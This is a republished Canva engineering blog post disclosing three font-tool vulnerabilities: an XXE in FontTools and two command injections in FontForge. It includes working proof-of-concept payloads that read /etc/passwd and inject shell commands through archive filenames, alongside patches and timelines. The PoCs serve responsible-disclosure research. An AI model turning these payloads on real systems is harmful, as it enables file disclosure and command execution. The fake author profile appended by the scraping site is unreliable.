Fonts are still a Helvetica of a Problem - Canva Engineering Blog (2024)

At Canva, we’re continuously looking for waysto uplift the security of our processes, software, supply chain, and tools onour road to building the world’s most trusted platform. Canva processesmillions of files across a broad range of graphics formats every day. To helpus do this effectively, we use many open source tools and libraries.Building on existing research, we thought to look at less explored attacksurfaces, such as fonts that present a complex and prevalent part of graphicsprocessing.

The following sections describe some vulnerabilities we discovered whileexploring this line of thinking and demonstrate how security issues manifest infont processing tools.

Fonts have a long and convoluted historythat predates computing by many years, for example, the early printing press.When bitmaps first brought fonts to the digital realm, few could imagine wherewe’d end up today.

Fonts are still a Helvetica of a Problem - Canva Engineering Blog (1)

The current font landscape contains many specifications, each created for uniqueuse cases as required by corporations and individuals alike. This situationleaves font processing software developers with a difficult challenge, requiringthem to interpret vast specificationsacross many formats. Where there is such complexity, there is also plenty ofattack surface.

This is not a new idea. In 2015, Google’s Project Zeroreleased a series of blogsaround font security vulnerability research, and the following year, some blogsfocused on fuzzing for font handling vulnerabilities in the Windows kernel.In response to this research, the community made some significant changes,including creating the OpenType Sanitizerproject and its usage in Chrome and Firefox.

Although the previous research focused primarily on memory corruption bugs infont processing, we wondered what other kinds of security issues might occurwhen handling fonts.

The attack surface of SVG and XML parsers is a well-documented problem in theweb security field (see PortSwiggerand OWASP).However, we were surprised to discover that the SVG format also appears indigital typography in two unique ways.

Font formats that follow the sfnt containerstructure, like OpenTypeand TrueType,contain a number of tables needed for the font to work as intended. However,there are also many auxiliary tables, some of which are poorly documented orproprietary. One such auxiliary table is the SVG table.

The SVG tablesupports supplying SVG definitions for glyphs in a font and is one of severalways color fonts are supported.

Alternatively, it’s also possible, although deprecated(as of SVG 2), to define a font under the SVG specification itself. Such fontsare called SVG fonts. SVG fonts arose from a desire to support font descriptioncapabilities under SVG while web fonts (WOFF) were still being adopted.To embed a font in an SVG, the <font> element is used along with some otheringredients like a <font-face-src>, which points to the actual font definition(for example, a local TTF file).

We wondered then if we could reproduce well-understood SVG and XML handlingvulnerabilities in the world of font processing.

Gained in translation - CVE-2023-45139

Fonts have the potential to be quite large, especially when they support alarge variety of scripts (languages) or contain many glyphs like CJK(China, Japan, Korea) fonts. Two common performance-enhancing operations arecompression and subsetting.

Font compression is an important optimization that is largely achieved byconverting TrueType and OpenType fonts to the WOFF format.

Subsetting takes a specific selection of a font’s glyphs (a subset) and extractsthem to a standalone file. A great use case for subsetting is removing unneededscripts from a font when the client’s desired language is known. In such a case,only the glyphs required to represent the characters in a client’s language needbe sent to the client’s browser.

Fonts are still a Helvetica of a Problem - Canva Engineering Blog (2)

FontTools is a Pythonic do-it-allutility for working with fonts. Although subsetting can be a relatively naiveoperation (simply extracting glyphs matching a Unicode or character range),FontTools’ implementation performs additional size-reducing optimizations.

FontTools version 4.28.2added support for subsetting the SVG table for use in glyph coloring. To do this,the SVG table needs to be parsed to extract glyphIds matching those specifiedto be included in the subset.

Looking at how FontTools processes the SVG table in OTF fonts, we can see thatby default, the lxml XML parser resolves entities.So, if the parser walks an untrusted XML file, an XML External Entity (XXE)vulnerability occurs.

svg = etree.fromstring(

# encode because fromstring dislikes xml encoding decl if input is str.

# SVG xml encoding must be utf-8 as per OT spec.

doc.data.encode("utf-8"),

parser=etree.XMLParser(

# Disable libxml2 security restrictions to support very deep trees.

# Without this we would get an error like this:

# `lxml.etree.XMLSyntaxError: internal error: Huge input lookup`

# when parsing big fonts e.g. noto-emoji-picosvg.ttf.

huge_tree=True,

# ignore blank text as it's not meaningful in OT-SVG; it also prevents

# dangling tail text after removing an element when pretty_print=True

remove_blank_text=True,

),

)

python

Proof of concept

Knowing the XML parser used for subsetting the SVG table is misconfigured toallow for the resolution of arbitrary entities, we can construct an XML payloadto include /etc/passwd.

<?xml version="1.0"?>

<!DOCTYPE svg [<!ENTITY poc SYSTEM 'file:///etc/passwd'>]>

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<g id="glyph1">

<text font-size="10" x="0" y="10">&poc;</text>

</g>

</svg>

xml

We then need to pack the XML definition into the SVG tableso that it’s valid enough to be subset by FontTools. We can write a script tohelp us here by repurposing an existing FontTools integration testto quickly create a valid font.

from string import ascii_letters

from fontTools.fontBuilder import FontBuilder

from fontTools.pens.ttGlyphPen import TTGlyphPen

from fontTools.ttLib import newTable

XXE_SVG = """\

<?xml version="1.0"?>

<!DOCTYPE svg [<!ENTITY poc SYSTEM 'file:///etc/passwd'>]>

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<g id="glyph1">

<text font-size="10" x="0" y="10">&poc;</text>

</g>

</svg>

"""

def main():

# generate a random TTF font with an SVG table

glyph_order = [".notdef"] + list(ascii_letters)

pen = TTGlyphPen(glyphSet=None)

pen.moveTo((0, 0))

pen.lineTo((0, 500))

pen.lineTo((500, 500))

pen.lineTo((500, 0))

pen.closePath()

glyph = pen.glyph()

glyphs = {g: glyph for g in glyph_order}

fb = FontBuilder(unitsPerEm=1024, isTTF=True)

fb.setupGlyphOrder(glyph_order)

fb.setupCharacterMap({ord(c): c for c in ascii_letters})

fb.setupGlyf(glyphs)

fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})

fb.setupHorizontalHeader()

fb.setupOS2()

fb.setupPost()

fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

svg_table = newTable("SVG ")

svg_table.docList = [

(XXE_SVG, 1, 12)

]

fb.font["SVG "] = svg_table

fb.font.save('poc-payload.ttf')

if __name__ == '__main__':

main()

python

When we run the produced poc-payload.ttf against the FontTools subsettingutility, it produces a subsetted font with the following SVG table, whichincludes the entity resolved to the /etc/passwd file.

pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs \

ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

bash

<?xml version="1.0" encoding="UTF-8"?>

<ttFont sfntVersion="\x00\x01\x00\x00" ttLibVersion="4.42">

<SVG>

<svgDoc endGlyphID="12" startGlyphID="1">

<![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g id="glyph1"><text font-size="10" x="0" y="10">##

# User Database

#

# Note that this file is consulted directly only when the system is running

# in single-user mode. At other times this information is provided by

# Open Directory.

#

# See the opendirectoryd(8) man page for additional information about

# Open Directory.

##

nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false

xml

Patch and timeline

Following responsible disclosure, the maintainers were swift to implement a patch,which disabled entity resolution (that is, XMLParser(resolve_entities=False)),shortly followed by a releaseincluding the fix.

  • September 13, 2023: Reported issue to FontTools maintainers.
  • September 16, 2023: FontTools maintainers release a patch.
  • October 12, 2023: CVE issued by GitHub.
  • January 09, 2024: Advisory published by the maintainers.

Historically, for size reduction, it was desirable to pack multiple fonts(of the same or different formats) into one file. To do this, they establishedthe TrueType Collection (TTC) and Suitcase font formats.

Fonts are still a Helvetica of a Problem - Canva Engineering Blog (3)

To handle these formats, font software authors developed esoteric namingconventions as a convenience mechanism for users to work with such files.

Tools like FontForge and ImageMagick adopted the naming convention of using parentheses after the filename (for example, Alef-Regular.dfont(1)) to allow users to specify the desired font inside the collection to edit. FontForge refers to such files collectively as ‘subfonts’.

This is noteworthy because it highlights the need to preserve the filename, which can lead to security challenges when operating on the untrusted data

:(){ :|:& };:.zip - CVE-2024-25081

When FontForge attempts to handle archive files, based on the input files extension, it attempts to solve the problem of extracting the files from the archive by leveraging the cross-platform system() libc API. Ordinarily, this could be okay because the only user-controlled data would be the filename, which could be sanitized.However, preserving the original filename can be crucial to support working with subfonts.

Therefore, when assembling the command string for the archive list command the original filename is used, leading to a command injection vulnerability.

listcommand = malloc( strlen(archivers[i].unarchive) + 1 +

strlen( archivers[i].listargs) + 1 +

strlen( name ) + 3 +

strlen( listfile ) +4 );

sprintf( listcommand,

"%s %s %s > %s",

archivers[i].unarchive,

archivers[i].listargs,

name,

listfile );

if ( system(listcommand)!=0 ) {

//error handling

}

c

Proof of concept

Knowing that a filename with an archive extension will make its way to this sink, we can construct a simple proof of concept to demonstrate shell execution by including shell escape or subshell tokens in the filename.

touch archive.zip\;id\;.zip

bash

When supplied to Fontforge’s Open() procedure, the id command result is printed to stdout.

fontforge -lang=ff -c 'Open($1);' archive.zip\;id\;.zip /tmp/zip.ttf

bash

Copyright (c) 2000-2024. See AUTHORS for Contributors.

# [SNIP]

sh: 1: unzip: not found

uid=0(root) gid=0(root) groups=0(root)

sh: 1: .zip: not found

# [SNIP]

bash

Patch and timeline

After liaising with the FontForge maintainers, we submitted a patch we developed, which was later merged by the maintainers.

  • January 19, 2024: Reported issue to FontForge maintainers.

  • February 6, 2024: Raised a pull request for the patch and merged it into the FontForge main branch.

Font compression is a popular choice for web fonts because it can reduce the amount of data downloaded by clients and improve web page responsiveness. WOFF and WOFF2 (font types developed for the web) were specifically designed to use compression, with WOFF using ZLIB and WOFF2 using Brotli (which offers a 30% reduction in file size).

However, other font formats (such as TTF) don’t natively support compression and file sizes can be quite large. There are ways to remedy this, for example, Google Fonts lets you dynamically subset a font to only what you need, gaining up to a 90% reduction in file size.

Because of font compression, it’s popular for fonts to be distributed as archive files, for both the compression aspects and for bundling many font families together. Tools like FontForge now include support for dealing with archive files. Some tools can even reach into the archive file and modify files in situ (such as exiftools), however, FontForge extracts the fonts first into a temporary directory to work on them.

Font tartare - CVE-2024-25082

A vulnerability was discovered when FontForge parses the Table of Contents (TOC) for an archive file. The TOC is a list of all the files compressed in the archive and FontForge uses this to pull a font file out to perform actions on.

The filename comes from the ArchiveParseTOC function, which means we can create an archive containing a malicious filename, bypassing traditional filename sanitization techniques, and triggering our exploit. As stated previously, filenames are important when dealing with fonts and this is another example of why it can be tricky to sanitize them.

// Retrieves the first filename in the archive

desiredfile = ArchiveParseTOC(listfile, archivers[i].ars, &doall);

// ... some checks ...

unarchivecmd = malloc(strlen(archivers[i].unarchive) + 1 +

strlen( archivers[i].listargs) + 1 +

strlen( name ) + 1 +

strlen( desiredfile ) + 3 +

strlen( archivedir ) + 30 );

sprintf(unarchivecmd,

"( cd %s ; %s %s %s %s ) > /dev/null",

archivedir,

archivers[i].unarchive,

archivers[i].extractargs,

name,

doall ? "" : desiredfile );

if ( system(unarchivecmd)!=0 ) {

// error handling

}

c

Using this, it’s possible to get command injection in FontForge, either running in server mode or in the desktop application.

Proof of concept

Knowing that FontForge unsafely handles the first filename in an archive, we were able to craft a malicious payload containing system commands to be executed. The POC script below generates a .tar archive file with our exploit as the first file.

#!/usr/bin/env python3

import tarfile

import os

exec_command = f"$(touch /tmp/poc)"

with tarfile.open("poc.tar", "w", format=tarfile.USTAR_FORMAT) as t:

t.addfile(tarfile.TarInfo(exec_command))

python

Using the tar tf poc.tar command, we can list all of the files in the archive.

$ tar tf poc.tar

$(touch /tmp/poc)

$ cat poc.tar

$(touch /tmp/poc)0000644000000000000000000000000000000000000010606 0ustar00

bash

Similar to CVE-2024-25081 we can open the file with FontForge and observe that our exploit triggers. Whether the file is opened through the CLI or GUI makes no difference (except for operating system-specific commands).

Patch and timeline

The patch involved converting all of the system() calls with g_spawn_sync or g_spawn_async functions because the GLIB spawn calls don’t run in a shell environment. Doing it this way, we can safely execute system commands.

- snprintf( buf, sizeof(buf), "%s < %s > %s", compressors[compression].decomp, name, tmpfn );

- if ( system(buf)==0 )

- return( tmpfn );

- free(tmpfn);

- return( NULL );

+ command[0] = compressors[compression].decomp;

+ command[1] = "-c";

+ command[2] = name;

+ command[3] = NULL;

+

+ if (!g_spawn_async_with_pipes(

+ NULL,

+ command,

+ NULL,

+ G_SPAWN_DO_NOT_REAP_CHILD | G_SPAWN_SEARCH_PATH,

+ NULL,

+ NULL,

+ NULL,

+ NULL,

+ &stdout_pipe,

+ NULL,

+ NULL)) {

+ //command has failed

+ return( NULL );

+ }

+

+ // Read from the pipe.

+ while ((bytes_read = read(stdout_pipe, buffer, sizeof(buffer))) > 0) {

+ g_byte_array_append(binary_data, (guint8 *)buffer, bytes_read);

+ }

+ close(stdout_pipe);

+

+ FILE *fp = fopen(tmpfn, "wb");

+ fwrite(binary_data->data, sizeof(gchar), binary_data->len, fp);

+ fclose(fp);

+ g_byte_array_free(binary_data, TRUE);

diff

The timeline corresponds to that of CVE-2024-25081.

Fonts are complicated and safely handling them is a difficult problem to solve.You should treat fonts like any other untrusted input:

  • Implement sandboxing for anything that processes fonts.
  • Employ tools like OpenType-Sanitizer.

It can be difficult for maintainers to handle security problems, so havingsecurity engineers provide patching can speed up the process and buildrapport with the open source community. We’d like to thank all the maintainersof open source font software and tools for their hard work. Finally, we hope tosee more font security research in the future because we believe it’s an areastill lacking in security maturity.

Fonts are still a Helvetica of a Problem - Canva Engineering Blog (2024)
Top Articles
Latest Posts
Article information

Author: Amb. Frankie Simonis

Last Updated:

Views: 6747

Rating: 4.6 / 5 (56 voted)

Reviews: 87% of readers found this page helpful

Author information

Name: Amb. Frankie Simonis

Birthday: 1998-02-19

Address: 64841 Delmar Isle, North Wiley, OR 74073

Phone: +17844167847676

Job: Forward IT Agent

Hobby: LARPing, Kitesurfing, Sewing, Digital arts, Sand art, Gardening, Dance

Introduction: My name is Amb. Frankie Simonis, I am a hilarious, enchanting, energetic, cooperative, innocent, cute, joyous person who loves writing and wants to share my knowledge and understanding with you.